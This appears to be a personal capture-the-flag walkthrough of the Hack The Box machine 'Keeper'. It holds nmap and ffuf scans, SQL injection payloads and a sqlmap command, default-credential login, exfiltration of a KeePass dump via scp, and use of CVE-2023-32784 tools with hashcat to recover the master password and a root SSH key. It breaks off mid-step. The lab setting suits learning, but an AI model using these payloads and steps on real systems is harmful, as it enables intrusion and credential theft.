# Lessons Learned - xxx --- # # After-Action Attack Sequence - BLUF: xxx - xxx --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260417192328.png]] - `nmap` scan - light ![[images/Pasted image 20260417192348.png]] - `nmap` scan - detailed ![[images/Pasted image 20260417192456.png]] - `nmap` scan - UDP ![[images/Pasted image 20260417194611.png]] --- # Service Enum ## Port 80 (HTTP): nginx 1.18.0 ## `http://IP_addr` - visit page ![[images/Pasted image 20260417192624.png]] - source ![[images/Pasted image 20260417192643.png]] - `request:response` ![[images/Pasted image 20260417192719.png]] ## `tickets.keeper.htb/rt` - Add to `/etc/hosts` - Visit page > Request Tracker ver. 4.4.4 ![[images/Pasted image 20260417193009.png]] - source ![[images/Pasted image 20260417193249.png]] - I see `/rt/NoAuth/Login.html` - `request:response` ![[images/Pasted image 20260417193400.png]] - We have a cookie with another vhost? - test with blank login ![[images/Pasted image 20260417194033.png]] - Maybe the `next` parameter is an encoded IDOR vector? ### Fuzzing - Directory fuzzing ![[images/Pasted image 20260417201541.png]] - `/m/` for mobile ![[images/Pasted image 20260417193707.png]] - Potential SQLi ![[images/Pasted image 20260417193910.png]] ```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://tickets.keeper.htb/FUZZ -c -ic -fs 0,95 ``` - Vhost fuzzing ![[images/Pasted image 20260417201657.png]] - Subdomain fuzzing ### SQLi - Manual SQLi tests - None of these work ```bash admin' admin'-- - admin' OR 1=1 admin' OR 1=1-- - ``` - `sqlmap` against `/rt` - nothing ```bash sqlmap -r request.txt --batch --dbms=mysql --technique=BEU --risk=3 --level=5 ``` - Manual UNION injection tests ```bash test' UNION SELECT 1,2;-- - test' UNION SELECT 1,2,2,3,4,5,6;-- - test' UNION SELECT 1,@@version,2,3,4,5,6;-- - #once we determine the number of columns, determine the injectable column ``` ## Default Creds - `admin:admin` - `root:password` -- from some Googling on request tracker 4.4.4 - We're in as `root` ![[images/Pasted image 20260417195623.png]] - There is one open ticket ![[images/Pasted image 20260417195749.png]] - crash dump of `keepass` attached to initial ticket; then removed by sysadmin - `lnorgaard` and saved to their home dir - maybe we can load a script to get a revshell as wwwdata then crack the keepass db? - look for authenticated RCEs - no POCs found from Googling - `searchsploit` ![[images/Pasted image 20260417202409.png]] - `searchsploit`![[images/Pasted image 20260417202501.png]] - Comment field for `lnorgaard` has a password ![[images/Pasted image 20260417203102.png]] - `ssh` into target with creds for `lnorgaard` ![[images/Pasted image 20260417203238.png]] - let's exfil this ZIP, I assume its the keepass db ```bash scp [email protected]:/home/lnorgaard/RT30000.zip ~/Documents/htb/boxes/keeper/RT30000.zip ``` ![[images/Pasted image 20260417203542.png]] - Unzip and inspect ![[images/Pasted image 20260417203626.png]] - Run `keepass2john` and attempt to crack with `-m 13400` ```bash keepass2john passcodes.kdbx > keepass.hash hashcat -m 13400 keepass.hash /opt/rockyou.txt ``` - This is taking too long - Let's Google "keepass 2.x exploits" - Found CVE-2023-32784 which exploits a keepass dump file, which we have - https://github.com/vdohney/keepass-password-dumper uses .NET - https://github.com/matro7sh/keepass-dump-masterkey uses python - notes that the first character will be missing - https://github.com/ynuwenhof/keedump uses rust ## .NET version - Install .NET ```bash wget https://packages.microsoft.com/config/debian/13/packages-microsoft-prod.deb -O packages-microsoft-prod.deb sudo dpkg -i packages-microsoft-prod.deb #install signing key rm packages-microsoft-prod.deb sudo apt-get update && sudo apt-get install -y dotnet-sdk-10.0 #.NET SDK sudo apt-get update && sudo apt-get install -y aspnetcore-runtime-10.0 #.NET runtime git clone https://github.com/vdohney/keepass-password-dumper cd ./keepass-password-dumper dotnet run ~/Documents/htb/boxes/keeper/KeePassDumpFull.dmp ``` - Looks like the POC is using .NET 7.0, but I downloaded 10.0 ![[images/Pasted image 20260417211347.png]] ## Rust version ```bash curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh sudo apt install cargo cargo install keedump git clone https://github.com/ynuwenhof/keedump.git cd keedump cargo install --path . echo "export PATH="$HOME/.cargo/bin:$PATH"" >> ~/.bashrc source ~/.bashrc echo $PATH #confirm keedump -i ~/Documents/htb/boxes/keeper/KeePassDumpFull.dmp ``` - Illegible ![[images/Pasted image 20260417205521.png]] ## `strings` - Way too many lines ![[images/Pasted image 20260417212022.png]] - Try to pipe into grep ![[images/Pasted image 20260417212031.png]] ## Python version - still getting a garbage output ![[images/Pasted image 20260417210213.png]] - Google the output > we see a Danish porridge ![[images/Pasted image 20260417213007.png]] - Now download `kpcli` and open ```bash sudo apt install -y kpcli kpcli open passcodes.kdbx ``` - `passcords/Network` has 2 entries ![[images/Pasted image 20260417213752.png]] - Entry 0 has a hidden password and a PuTTY privkey ![[images/Pasted image 20260417213849.png]] - After some Googling, we can use `-f` to reverse the redaction - Use `su root` to privesc - fails - Now create a `.ppk` and clean it up - Convert `.ppk` to openssh